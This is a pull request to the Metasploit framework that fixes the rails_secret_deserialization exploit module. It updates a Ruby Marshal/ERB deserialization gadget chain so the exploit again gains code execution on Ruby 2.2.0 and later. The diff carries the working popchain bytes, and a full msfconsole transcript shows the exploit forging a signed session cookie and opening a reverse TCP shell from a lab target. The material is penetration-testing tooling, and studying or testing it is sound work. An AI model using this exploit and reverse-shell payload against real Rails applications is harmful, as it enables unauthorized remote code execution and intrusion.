### PR TITLE
Fix rails_secret_deserialization popchain (ERB @lineno)

### DIFF
--- a/modules/exploits/multi/http/rails_secret_deserialization.rb
+++ b/modules/exploits/multi/http/rails_secret_deserialization.rb
@@ -200,8 +200,9 @@ class MetasploitModule < Msf::Exploit::Remote
       return "\x04\b" +
       "o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\b" +
         ":\x0E@instanceo" +
-          ":\bERB\x06" +
+          ":\bERB\x07" +
             ":\t@src"+  Marshal.dump(code)[2..-1] +
+            ":\x0c@lineno"+ "i\x00" + 
         ":\f@method:\vresult:" +
         "\x10@deprecatoro:\x1FActiveSupport::Deprecation\x00"
     end
@@ -209,9 +210,10 @@ class MetasploitModule < Msf::Exploit::Remote
       return Rex::Text.encode_base64 "\x04\x08" +
       "o"+":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy"+"\x07" +
         ":\x0E@instance" +
-          "o"+":\x08ERB"+"\x06" +
+          "o"+":\x08ERB"+"\x07" +
             ":\x09@src" +
               Marshal.dump(code)[2..-1] +
+            ":\x0c@lineno"+ "i\x00" + 
         ":\x0C@method"+":\x0Bresult"
     end
   end

--- a/modules/exploits/multi/http/rails_secret_deserialization.rb
+++ b/modules/exploits/multi/http/rails_secret_deserialization.rb
@@ -202,7 +202,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ":\x0E@instanceo" +
           ":\bERB\x07" +
             ":\t@src"+  Marshal.dump(code)[2..-1] +
-            ":\x0c@lineno"+ "i\x00" + 
+            ":\x0c@lineno"+ "i\x00" +
         ":\f@method:\vresult:" +
         "\x10@deprecatoro:\x1FActiveSupport::Deprecation\x00"
     end
@@ -213,7 +213,7 @@ class MetasploitModule < Msf::Exploit::Remote
           "o"+":\x08ERB"+"\x07" +
             ":\x09@src" +
               Marshal.dump(code)[2..-1] +
-            ":\x0c@lineno"+ "i\x00" + 
+            ":\x0c@lineno"+ "i\x00" +
         ":\x0C@method"+":\x0Bresult"
     end
   end


### PR DESCRIPTION
ERB changed as per https://github.com/ruby/ruby/commit/e82f4195d4 which broke the popchain used for code execution. This ERB landed in Ruby 2.2.0.

Fleshing out the Marshalled objects to include an `@lineno` attribute for the ERB object makes the ERB part of the popchain happy again on Ruby >= 2.2.0. It still works against Ruby < 2.2.0 in my testing.
## Verification

List the steps needed to make sure this thing works
- [x] Start `msfconsole`
- [x] `use exploit/multi/http/rails_secret_deserialization`
- [x] set `RHOST`, `RPORT`, `RAILSVERSION`, `SSL`, `SECRET`, `COOKIE_NAME`, `TARGETURI`, and a payload with options
- [x] **Verify** still gets a shell on one or more combinations of: Ruby <2.2.0 with either Rails 3 or Rails 4
- [x] **Verify** now gets a shell on one or more combinations of: Ruby >=2.2.0 with either Rails 3 or Rails 4
## Sample - Ruby 2.2.0, Rails 4.2.7.1

```
msf > use exploit/multi/http/rails_secret_deserialization
msf exploit(rails_secret_deserialization) > set RHOST 172.18.0.2
RHOST => 172.18.0.2
msf exploit(rails_secret_deserialization) > set RPORT 3000
RPORT => 3000
msf exploit(rails_secret_deserialization) > set RAILSVERSION 4
RAILSVERSION => 4
msf exploit(rails_secret_deserialization) > set SSL false
SSL => false
msf exploit(rails_secret_deserialization) > set SECRET b6bc88adec1192ab59b80d9d5de28171d5d238fc097ca7eadeaffabcae9c36c97503f0625f3c2d029fba5daea579acaa876bf72caae879645328580d3454f2c6
SECRET => b6bc88adec1192ab59b80d9d5de28171d5d238fc097ca7eadeaffabcae9c36c97503f0625f3c2d029fba5daea579acaa876bf72caae879645328580d3454f2c6
msf exploit(rails_secret_deserialization) > set COOKIE_NAME _blog_session
COOKIE_NAME => _blog_session
msf exploit(rails_secret_deserialization) > set TARGETURI /sesstest/index
TARGETURI => /sesstest/index
msf exploit(rails_secret_deserialization) > set PAYLOAD ruby/shell_reverse_tcp
PAYLOAD => ruby/shell_reverse_tcp
msf exploit(rails_secret_deserialization) > set LHOST 172.18.0.1
LHOST => 172.18.0.1
msf exploit(rails_secret_deserialization) > set LPORT 4444
LPORT => 4444
msf exploit(rails_secret_deserialization) > show options

Module options (exploit/multi/http/rails_secret_deserialization):

   Name             Current Setting                                                                                                                   Required  Description
   ----             ---------------                                                                                                                   --------  -----------
   COOKIE_NAME      _blog_session                                                                                                                     no        The name of the session cookie
   DIGEST_NAME      SHA1                                                                                                                              yes       The digest type used to HMAC the session cookie
   HTTP_METHOD      GET                                                                                                                               yes       The HTTP request method (GET, POST, PUT typically work)
   Proxies                                                                                                                                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RAILSVERSION     4                                                                                                                                 yes       The target Rails Version (use 3 for Rails3 and 2, 4 for Rails4)
   RHOST            172.18.0.2                                                                                                                        yes       The target address
   RPORT            3000                                                                                                                              yes       The target port
   SALTENC          encrypted cookie                                                                                                                  yes       The encrypted cookie salt
   SALTSIG          signed encrypted cookie                                                                                                           yes       The signed encrypted cookie salt
   SECRET           b6bc88adec1192ab59b80d9d5de28171d5d238fc097ca7eadeaffabcae9c36c97503f0625f3c2d029fba5daea579acaa876bf72caae879645328580d3454f2c6  yes       The secret_token (Rails3) or secret_key_base (Rails4) of the application (needed to sign the cookie)
   SSL              false                                                                                                                             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI        /sesstest/index                                                                                                                   yes       The path to a vulnerable Ruby on Rails application
   VALIDATE_COOKIE  true                                                                                                                              no        Only send the payload if the session cookie is validated
   VHOST                                                                                                                                              no        HTTP server virtual host


Payload options (ruby/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.18.0.1       yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(rails_secret_deserialization) > exploit

[*] Started reverse TCP handler on 172.18.0.1:4444
[*] Checking for cookie _blog_session
[*] Found cookie, now checking for proper SECRET
[+] SECRET matches! Sending exploit payload
[*] Sending cookie _blog_session
[*] Command shell session 1 opened (172.18.0.1:4444 -> 172.18.0.2:38116) at 2016-09-13 21:36:02 +1000

uname
Linux
^C
Abort session 1? [y/N]  y

[*] 172.18.0.2 - Command shell session 1 closed.  Reason: User exit
```
# Release Notes

rails_secret_deserialization exploit was broken due to ERB changes that were introduced with Ruby 2.2.0. This fix adds support for Ruby >=2.2.0 by fleshing out the Marshalled objects to include a `@lineno` attribute. 
